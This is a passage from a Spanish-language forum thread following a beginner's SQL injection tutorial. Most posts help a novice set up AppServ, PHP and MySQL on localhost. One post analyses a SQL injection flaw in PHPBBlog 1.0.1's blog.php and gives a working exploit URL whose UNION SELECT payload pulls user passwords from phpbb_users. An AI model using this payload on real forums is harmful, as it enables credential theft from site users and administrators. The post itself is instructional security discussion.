 Encuesta
|
| Pregunta: |
Valora el artículo 
| Excelente |
   70 (63.6%) |
| Bueno |
26 (23.6%) |
| Pasable |
7 (6.4%) |
| Malo |
0 (0%) |
| Pésimo |
7 (6.4%) |
|
|
| Total de votos: 101 |
|
 Autor
|
Tema: SQL Injection para principiantes, ejemplos en aplicaciones reales. (Leído 94,202 veces)
|
Alesiter
 Desconectado
Mensajes: 187
|
el nombre de usuario y contraseña de la segunda imagen son el mismo nombre de usuario y contraseña que se pone al instalar el appServ? En data Base Host es el que esta? osea dede donde se accede al appServ? Data Base Name pongo la nueva base de datos que voy a crear? porfavor esa parte no le entiendo muy bien Servidor web donde alojar PHP y poder ejecutarlo con MySQL. (Puedes crearte una cuenta en un hosting gratuito o montarte tu propio servidor web)
Donde consigo uno ,alguien puede ayudarme? |
|
|
|
|
En línea
|
|
|
|
s0cratex
Desconectado
Mensajes: 27
|
Aquí otro ejemplo... Script: PHPBBlog 1.0.1 Descripción: Modulo para los foros PHPbb ************************************************ * http://mods.phpbbfrench.com/phpBBlog_FR_v1.0.1.zip ************************************************
Archivo: blog.php El problema Línea 34: Se crea un switch para la variable "perform" Línea 80: Si "perform" es igual a "edit"... Línea 92: La variable "id" es recibida por el script... $id = (isset($HTTP_POST_VARS['id'])) ? $HTTP_POST_VARS['id'] : $HTTP_GET_VARS['id']; Linea 94: Se ejecuta la siguiente sentencia SQL... $sql = "SELECT text FROM " . BLOG_TABLE . " WHERE id = $id LIMIT 1"; Pero la variable "id" nunca es comprobada por lo que la aplicacion se considera vulnerable a SQL Injection... Exploit:http://localhost/phpBB2/blog.php?perform=edit&id=1%20union%20select%20user_password%20from%20phpbb_users/*Ni me molesto en publicar este exploit porque para poder ejecutarlo tengo que ser administrador del blog. Claro sirve para ver el username y password de el primer usuario del foro, quien suele ser el Administrador/God...jeje en fin el objetivo era dar un ejemplo más...bye  |
|
|
|
« Última modificación: 3 Octubre 2006, 05:05 am por s0cratex »
|
En línea
|
------------------------------------
.:[| s0cratex security crazy |]:.
------------------------------------
|
|
|
|
Ertai
|
el nombre de usuario y contraseña de la segunda imagen son el mismo nombre de usuario y contraseña que se pone al instalar el appServ? En data Base Host es el que esta? osea dede donde se accede al appServ? Data Base Name pongo la nueva base de datos que voy a crear? porfavor esa parte no le entiendo muy bien Servidor web donde alojar PHP y poder ejecutarlo con MySQL. (Puedes crearte una cuenta en un hosting gratuito o montarte tu propio servidor web)
Donde consigo uno ,alguien puede ayudarme? Si te has instalado el Appserv y no has tocado nada, los datos son los siguientes: Host: localhost Usuario: root Password: (vacio) Database: elnombrekelepongascuandolacreas Y hosting no te hace falta entonces... Saludos! Fijate que puedes modificar el archivo en vez de seguir los pasos del instalador... Lee un poco más abajo!  Saludos!
|
|
|
|
|
En línea
|
Si la felicidad se comprara, entonces el dinero sería noble. void rotar_by_ref(int& a, int& b) {
/* Quien dijo que no se podia sin una variable temporal? */
*a = *a ^ *b;
*b = *a ^ *b;
*a = *a ^ *b;
}
|
|
|
Alesiter
Desconectado
Mensajes: 187
|
Si te has instalado el Appserv y no has tocado nada, los datos son los siguientes:
Host: localhost
Usuario: root
Password: (vacio)
Database: elnombrekelepongascuandolacreas
el password del mio tambien es root, pongo ese? Y hosting no te hace falta entonces...
pero en el tutorial dice q debo tener alguna cuenta para ospedar los php
|
|
|
|
|
En línea
|
|
|
|
|
Ertai
|
Si cambiaste los datos, ponle los que pusiste.
La cuenta de hosting es solo por si no tienes un servidor local.
|
|
|
|
|
En línea
|
Si la felicidad se comprara, entonces el dinero sería noble. void rotar_by_ref(int& a, int& b) {
/* Quien dijo que no se podia sin una variable temporal? */
*a = *a ^ *b;
*b = *a ^ *b;
*a = *a ^ *b;
}
|
|
|
Alesiter
Desconectado
Mensajes: 187
|
La cuenta de hosting es solo por si no tienes un servidor local. como se si tengo un servidor local? yo lo quiero hacer desde mi casa ,desde mi pc, no esta en red ni nada
|
|
|
|
|
En línea
|
|
|
|
byebye
Desconectado
Mensajes: 5.093
|
como se si tengo un servidor local? yo lo quiero hacer desde mi casa ,desde mi pc, no esta en red ni nada tu sabras si tienes instalado un servidor web. no hace falta que este en red, si instalas un servidor web en tu ordenador solo tienes que ir a http://localhost y ahi tienes tu pagina o lo que quieras poner.
|
|
|
|
|
En línea
|
|
|
|
Alesiter
Desconectado
Mensajes: 187
|
el http:\localhost si funciona en mi maquino ,creo q se habilito al instalar el appServ, entonces ahi tambien puedo ospedar mis php?
pero eso solo lo uso para hacer bases de datos
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Aspirante a supervillano
Moderador
Desconectado
Mensajes: 7.029
No estoy loco, soy mentalmente divergente
|
si, de hecho con appserv ya tienes mysql.
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
Alesiter
Desconectado
Mensajes: 187
|
hola ,soy novato en esto ,pero tengo muchas ganas de aprender y espero me tengan un poco de paciencia como abro el archivo installl.php del zip que me baje ,cuando hago doble click me habre el dreamwaver ,que programa necesito? dicen q lo abra desde el navegador ,cual navegador? Ejecutar estas dos sentencias SQL desde un interprete para MySQL o desde el phpMyAdmin que interprete para mySQL ? Que programas necesito ,porfavor indiquenme es q me confunde tantos programas q existe |
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Ejemplos scripts PHP para Banear IP y Rangos de IP's
PHP
|
el-brujo
|
0
|
10,271
|
1 Junio 2012, 20:58 pm
por el-brujo
|
|
|
|
Ataques XSS avanzados a aplicaciones webs: 3 Ejemplos
Nivel Web
|
MichBukana
|
2
|
4,225
|
27 Octubre 2013, 20:18 pm
por Shout
|
|
|
|
Tutoriales ejemplos para trabajar con arrays ?
.NET (C#, VB.NET, ASP)
|
luis456
|
2
|
2,503
|
20 Diciembre 2013, 16:18 pm
por luis456
|
|
|
|
Soluciones científicas reales para no extinguirnos
Foro Libre
|
Eleкtro
|
5
|
2,787
|
15 Enero 2020, 00:58 am
por engel lex
|
 |
